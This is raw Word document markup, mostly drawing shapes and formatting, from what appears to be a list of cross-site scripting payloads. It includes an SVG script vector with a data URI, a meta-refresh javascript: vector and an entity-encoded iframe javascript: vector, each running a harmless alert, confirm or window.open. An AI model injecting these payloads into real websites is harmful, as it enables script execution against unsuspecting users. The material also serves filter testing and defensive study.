                            <a:gd name="T39" fmla="*/ 3753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5FBBC" id="Freeform 111" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:185.25pt;width:2.45pt;height:2.45pt;z-index:-15472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" path="m28,48r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,2383155;13335,2383155;11430,2383155;0,2369820;0,2366010;13335,2352675;17780,2352675;31115,2367915;31115,2369820;17780,238315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4486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2306320</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4483100" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="107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3100" cy="116205"/>
                          <a:chOff x="1930" y="3632"/>
                          <a:chExt cx="7060" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="108" name="Freeform 110"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="3631"/>
                            <a:ext cx="7060" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 8968 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 7060"/>
                              <a:gd name="T2" fmla="+- 0 3814 3632"/>
                              <a:gd name="T3" fmla="*/ 3814 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 7060"/>
                              <a:gd name="T6" fmla="+- 0 3814 3632"/>
                              <a:gd name="T7" fmla="*/ 3814 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 7060"/>
                              <a:gd name="T10" fmla="+- 0 3814 3632"/>
                              <a:gd name="T11" fmla="*/ 3814 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 7060"/>
                              <a:gd name="T14" fmla="+- 0 3793 3632"/>
                              <a:gd name="T15" fmla="*/ 3793 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 7060"/>
                              <a:gd name="T18" fmla="+- 0 3790 3632"/>
                              <a:gd name="T19" fmla="*/ 3790 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 7060"/>
                              <a:gd name="T22" fmla="+- 0 3653 3632"/>
                              <a:gd name="T23" fmla="*/ 3653 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 7060"/>
                              <a:gd name="T26" fmla="+- 0 3632 3632"/>
                              <a:gd name="T27" fmla="*/ 3632 h 183"/>
                              <a:gd name="T28" fmla="+- 0 8968 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 7060"/>
                              <a:gd name="T30" fmla="+- 0 3632 3632"/>
                              <a:gd name="T31" fmla="*/ 3632 h 183"/>
                              <a:gd name="T32" fmla="+- 0 8989 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 7060"/>
                              <a:gd name="T34" fmla="+- 0 3653 3632"/>
                              <a:gd name="T35" fmla="*/ 3653 h 183"/>
                              <a:gd name="T36" fmla="+- 0 8989 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 7060"/>
                              <a:gd name="T38" fmla="+- 0 3793 3632"/>
                              <a:gd name="T39" fmla="*/ 3793 h 183"/>
                              <a:gd name="T40" fmla="+- 0 8971 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 7060"/>
                              <a:gd name="T42" fmla="+- 0 3814 3632"/>
                              <a:gd name="T43" fmla="*/ 3814 h 183"/>
                              <a:gd name="T44" fmla="+- 0 8968 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 7060"/>
                              <a:gd name="T46" fmla="+- 0 3814 3632"/>
                              <a:gd name="T47" fmla="*/ 381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060" h="183">
                                <a:moveTo>
                                  <a:pt x="703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038" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7059" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7059" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7041" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="70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631"/>
                            <a:ext cx="706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&lt;svg&gt;&lt;script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xlink:href=data&amp;colon;,window.open('https://</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId92">
                                <w:r>
                                  <w:rPr>
                                    <w:rFonts w:ascii="Lucida Console"/>
                                    <w:color w:val="36454E"/>
                                    <w:w w:val="90"/>
                                    <w:sz w:val="15"/>
                                  </w:rPr>
                                  <w:t>www.google.com/')</w:t>
                                </w:r>
                              </w:hyperlink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&gt;&lt;/script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8" o:spid="_x0000_s2223" style="position:absolute;margin-left:96.5pt;margin-top:181.6pt;width:353pt;height:9.15pt;z-index:-15471616;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,3632" coordsize="706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">
                <v:shape id="Freeform 110" o:spid="_x0000_s2224" style="position:absolute;left:1930;top:3631;width:7060;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="706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/spMYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP3UoDMRCF7wXfIUzBG7HZikjZNi1VKChFpD8PMG6m&#10;m6XJZN2kbXx750LwboZz5pxv5ssSvLrQkLrIBibjChRxE23HrYHDfv0wBZUyskUfmQz8UILl4vZm&#10;jrWNV97SZZdbJSGcajTgcu5rrVPjKGAax55YtGMcAmZZh1bbAa8SHrx+rKpnHbBjaXDY06uj5rQ7&#10;BwPdelPOH8fD5Ov90228f/kuT/dozN2orGagMpX8b/67frOCXwmtPCMT6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/spMYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m7038,182l21,182r-3,l,161r,-3l,21,21,,7038,r21,21l7059,161r-18,21l7038,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="7038,3814;21,3814;18,3814;0,3793;0,3790;0,3653;21,3632;7038,3632;7059,3653;7059,3793;7041,3814;7038,3814" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 109" o:spid="_x0000_s2225" type="#_x0000_t202" style="position:absolute;left:1930;top:3631;width:706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T4csIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9C/6HMEJvmuhBdGsUEYVCQbpuDz1ON+Nu&#10;cDNZN6mu/74RCr3N433OatO7RtyoC9azhulEgSAuvbFcafgsDuMFiBCRDTaeScODAmzWw8EKM+Pv&#10;nNPtFCuRQjhkqKGOsc2kDGVNDsPEt8SJO/vOYUywq6Tp8J7CXSNnSs2lQ8upocaWdjWVl9OP07D9&#10;4nxvr8fvj/yc26JYKn6fX7R+GfXbVxCR+vgv/nO/mTRfLeH5TLp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5Phy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&lt;svg&gt;&lt;script</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="19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xlink:href=data&amp;colon;,window.open('https://</w:t>
                        </w:r>
                        <w:hyperlink r:id="rId93">
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:ascii="Lucida Console"/>
                              <w:color w:val="36454E"/>
                              <w:w w:val="90"/>
                              <w:sz w:val="15"/>
                            </w:rPr>
                            <w:t>www.google.com/')</w:t>
                          </w:r>
                        </w:hyperlink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&gt;&lt;/script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4537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2576195</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="106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4106 4057"/>
                            <a:gd name="T3" fmla="*/ 4106 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 4106 4057"/>
                            <a:gd name="T7" fmla="*/ 4106 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 4105 4057"/>
                            <a:gd name="T11" fmla="*/ 4105 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 4085 4057"/>
                            <a:gd name="T15" fmla="*/ 4085 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 4078 4057"/>
                            <a:gd name="T19" fmla="*/ 4078 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 4057 4057"/>
                            <a:gd name="T23" fmla="*/ 4057 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 4057 4057"/>
                            <a:gd name="T27" fmla="*/ 4057 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 4081 4057"/>
                            <a:gd name="T31" fmla="*/ 4081 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 4085 4057"/>
                            <a:gd name="T35" fmla="*/ 4085 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 4106 4057"/>
                            <a:gd name="T39" fmla="*/ 410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BBA56" id="Freeform 107" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:202.85pt;width:2.45pt;height:2.45pt;z-index:-15471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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,2607310;13335,2607310;11430,2606675;0,2593975;0,2589530;13335,2576195;17780,2576195;31115,2591435;31115,2593975;17780,260731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4588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2529840</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3518535" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="103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8535" cy="116205"/>
                          <a:chOff x="1930" y="3984"/>
                          <a:chExt cx="5541" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="104" name="Freeform 106"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="3984"/>
                            <a:ext cx="5541" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 7450 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 5541"/>
                              <a:gd name="T2" fmla="+- 0 4167 3984"/>
                              <a:gd name="T3" fmla="*/ 4167 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 5541"/>
                              <a:gd name="T6" fmla="+- 0 4167 3984"/>
                              <a:gd name="T7" fmla="*/ 4167 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 5541"/>
                              <a:gd name="T10" fmla="+- 0 4166 3984"/>
                              <a:gd name="T11" fmla="*/ 4166 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 5541"/>
                              <a:gd name="T14" fmla="+- 0 4145 3984"/>
                              <a:gd name="T15" fmla="*/ 4145 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 5541"/>
                              <a:gd name="T18" fmla="+- 0 4142 3984"/>
                              <a:gd name="T19" fmla="*/ 4142 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 5541"/>
                              <a:gd name="T22" fmla="+- 0 4005 3984"/>
                              <a:gd name="T23" fmla="*/ 4005 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 5541"/>
                              <a:gd name="T26" fmla="+- 0 3984 3984"/>
                              <a:gd name="T27" fmla="*/ 3984 h 183"/>
                              <a:gd name="T28" fmla="+- 0 7450 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 5541"/>
                              <a:gd name="T30" fmla="+- 0 3984 3984"/>
                              <a:gd name="T31" fmla="*/ 3984 h 183"/>
                              <a:gd name="T32" fmla="+- 0 7471 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 5541"/>
                              <a:gd name="T34" fmla="+- 0 4005 3984"/>
                              <a:gd name="T35" fmla="*/ 4005 h 183"/>
                              <a:gd name="T36" fmla="+- 0 7471 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 5541"/>
                              <a:gd name="T38" fmla="+- 0 4145 3984"/>
                              <a:gd name="T39" fmla="*/ 4145 h 183"/>
                              <a:gd name="T40" fmla="+- 0 7453 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 5541"/>
                              <a:gd name="T42" fmla="+- 0 4166 3984"/>
                              <a:gd name="T43" fmla="*/ 4166 h 183"/>
                              <a:gd name="T44" fmla="+- 0 7450 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 5541"/>
                              <a:gd name="T46" fmla="+- 0 4167 3984"/>
                              <a:gd name="T47" fmla="*/ 416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541" h="183">
                                <a:moveTo>
                                  <a:pt x="552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5520" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5541" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5541" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5523" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="552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984"/>
                            <a:ext cx="554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&lt;meta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http-equiv="refresh"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9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content="0;url=javascript:confirm(1)"&gt;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" o:spid="_x0000_s2226" style="position:absolute;margin-left:96.5pt;margin-top:199.2pt;width:277.05pt;height:9.15pt;z-index:-15470592;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,3984" coordsize="554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">
                <v:shape id="Freeform 106" o:spid="_x0000_s2227" style="position:absolute;left:1930;top:3984;width:5541;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="554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cLWMEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2vCQBC+F/wPywjemk1ESkmzhlIVvHjQCqG3ITt5&#10;YHY2ZlcT/71bKPQ2H99zsnwynbjT4FrLCpIoBkFcWt1yreD8vXt9B+E8ssbOMil4kIN8PXvJMNV2&#10;5CPdT74WIYRdigoa7/tUSlc2ZNBFticOXGUHgz7AoZZ6wDGEm04u4/hNGmw5NDTY01dD5eV0Mwou&#10;5WbbIuJ4LYofPBSVRZnslVrMp88PEJ4m/y/+c+91mB+v4PeZcIF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/HC1jBAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m5520,183l21,183r-3,-1l,161r,-3l,21,21,,5520,r21,21l5541,161r-18,21l5520,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="5520,4167;21,4167;18,4166;0,4145;0,4142;0,4005;21,3984;5520,3984;5541,4005;5541,4145;5523,4166;5520,4167" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 105" o:spid="_x0000_s2228" type="#_x0000_t202" style="position:absolute;left:1930;top:3984;width:554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yd8IA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/wPYYTeamKh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fJ3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&lt;meta</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="7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http-equiv="refresh"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="79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content="0;url=javascript:confirm(1)"&gt;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4640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2792095</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="102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4446 4397"/>
                            <a:gd name="T3" fmla="*/ 4446 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 4446 4397"/>
                            <a:gd name="T7" fmla="*/ 4446 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 4445 4397"/>
                            <a:gd name="T11" fmla="*/ 4445 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 4425 4397"/>
                            <a:gd name="T15" fmla="*/ 4425 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 4418 4397"/>
                            <a:gd name="T19" fmla="*/ 4418 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 4397 4397"/>
                            <a:gd name="T23" fmla="*/ 4397 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 4397 4397"/>
                            <a:gd name="T27" fmla="*/ 4397 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 4422 4397"/>
                            <a:gd name="T31" fmla="*/ 4422 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 4425 4397"/>
                            <a:gd name="T35" fmla="*/ 4425 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 4446 4397"/>
                            <a:gd name="T39" fmla="*/ 444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AB422" id="Freeform 103" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:219.85pt;width:2.45pt;height:2.45pt;z-index:-15470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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,25r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,2823210;13335,2823210;11430,2822575;0,2809875;0,2805430;13335,2792095;17780,2792095;31115,2807970;31115,2809875;17780,282321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4691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2745740</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3842385" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="99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42385" cy="116205"/>
                          <a:chOff x="1930" y="4324"/>
                          <a:chExt cx="6051" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="100" name="Freeform 102"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="4324"/>
                            <a:ext cx="6051" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 7960 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 6051"/>
                              <a:gd name="T2" fmla="+- 0 4507 4324"/>
                              <a:gd name="T3" fmla="*/ 4507 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 6051"/>
                              <a:gd name="T6" fmla="+- 0 4507 4324"/>
                              <a:gd name="T7" fmla="*/ 4507 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 6051"/>
                              <a:gd name="T10" fmla="+- 0 4506 4324"/>
                              <a:gd name="T11" fmla="*/ 4506 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 6051"/>
                              <a:gd name="T14" fmla="+- 0 4486 4324"/>
                              <a:gd name="T15" fmla="*/ 4486 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 6051"/>
                              <a:gd name="T18" fmla="+- 0 4482 4324"/>
                              <a:gd name="T19" fmla="*/ 4482 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 6051"/>
                              <a:gd name="T22" fmla="+- 0 4346 4324"/>
                              <a:gd name="T23" fmla="*/ 4346 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 6051"/>
                              <a:gd name="T26" fmla="+- 0 4324 4324"/>
                              <a:gd name="T27" fmla="*/ 4324 h 183"/>
                              <a:gd name="T28" fmla="+- 0 7960 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 6051"/>
                              <a:gd name="T30" fmla="+- 0 4324 4324"/>
                              <a:gd name="T31" fmla="*/ 4324 h 183"/>
                              <a:gd name="T32" fmla="+- 0 7981 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 6051"/>
                              <a:gd name="T34" fmla="+- 0 4346 4324"/>
                              <a:gd name="T35" fmla="*/ 4346 h 183"/>
                              <a:gd name="T36" fmla="+- 0 7981 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 6051"/>
                              <a:gd name="T38" fmla="+- 0 4486 4324"/>
                              <a:gd name="T39" fmla="*/ 4486 h 183"/>
                              <a:gd name="T40" fmla="+- 0 7963 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 6051"/>
                              <a:gd name="T42" fmla="+- 0 4506 4324"/>
                              <a:gd name="T43" fmla="*/ 4506 h 183"/>
                              <a:gd name="T44" fmla="+- 0 7960 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 6051"/>
                              <a:gd name="T46" fmla="+- 0 4507 4324"/>
                              <a:gd name="T47" fmla="*/ 450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051" h="183">
                                <a:moveTo>
                                  <a:pt x="6030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6030" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6051" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6051" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6033" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="603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4324"/>
                            <a:ext cx="605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&lt;iframe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6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src=javascript&amp;colon;alert&amp;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lpar;document&amp;period;location&amp;rpar;&gt;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" o:spid="_x0000_s2229" style="position:absolute;margin-left:96.5pt;margin-top:216.2pt;width:302.55pt;height:9.15pt;z-index:-15469568;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,4324" coordsize="6051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">
                <v:shape id="Freeform 102" o:spid="_x0000_s2230" style="position:absolute;left:1930;top:4324;width:6051;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6051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pfGcIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9C/0PYQq9aWJptWyNUgoFwULpKp6Hzbi7&#10;uJksSVbXf985FLzNvK95s9qMvlMXiqkNbGE+M6CIq+Bari0c9l/TN1ApIzvsApOFGyXYrB8mKyxc&#10;uPIvXcpcKwnhVKCFJue+0DpVDXlMs9ATC3cK0WOWNdbaRbxKuO/0szEL7bFludBgT58NVedy8BaO&#10;P8PL923Yb3U0Oxrz4XW5m/fWPj2OH++gskB38b9766S+kfryjEy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el8ZwgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m6030,183l21,183r-3,-1l,162r,-4l,22,21,,6030,r21,22l6051,162r-18,20l6030,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="6030,4507;21,4507;18,4506;0,4486;0,4482;0,4346;21,4324;6030,4324;6051,4346;6051,4486;6033,4506;6030,4507" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 101" o:spid="_x0000_s2231" type="#_x0000_t202" style="position:absolute;left:1930;top:4324;width:6051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L0dMIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/ofwgjeaqIHqVujiLQgCNJ1PXicbsbd&#10;4Gay3URd/70pFLzN433OfNm7RlypC9azhvFIgSAuvbFcaTgUX2/vIEJENth4Jg13CrBcvL7MMTP+&#10;xjld97ESKYRDhhrqGNtMylDW5DCMfEucuJPvHMYEu0qaDm8p3DVyotRUOrScGmpsaV1Ted5fnIbV&#10;kfNP+7v7+c5PuS2KmeLt9Kz1cNCvPkBE6uNT/O/emDRfjeHvmXSB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kvR0wgAAANw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&lt;iframe</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="16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src=javascript&amp;colon;alert&amp;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lpar;document&amp;period;location&amp;rpar;&gt;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4742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3016250</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="98" name="Freeform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4798 4750"/>
                            <a:gd name="T3" fmla="*/ 4798 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 4798 4750"/>
                            <a:gd name="T7" fmla="*/ 4798 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 4798 4750"/>
                            <a:gd name="T11" fmla="*/ 4798 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 4777 4750"/>
                            <a:gd name="T15" fmla="*/ 4777 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 4771 4750"/>
                            <a:gd name="T19" fmla="*/ 4771 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 4750 4750"/>
                            <a:gd name="T23" fmla="*/ 4750 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 4750 4750"/>
                            <a:gd name="T27" fmla="*/ 4750 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 4774 4750"/>
                            <a:gd name="T31" fmla="*/ 4774 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 4777 4750"/>
                            <a:gd name="T35" fmla="*/ 4777 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 4798 4750"/>
                            <a:gd name="T39" fmla="*/ 4798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1D262" id="Freeform 99" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:237.5pt;width:2.45pt;height:2.45pt;z-index:-15469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" path="m28,48r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
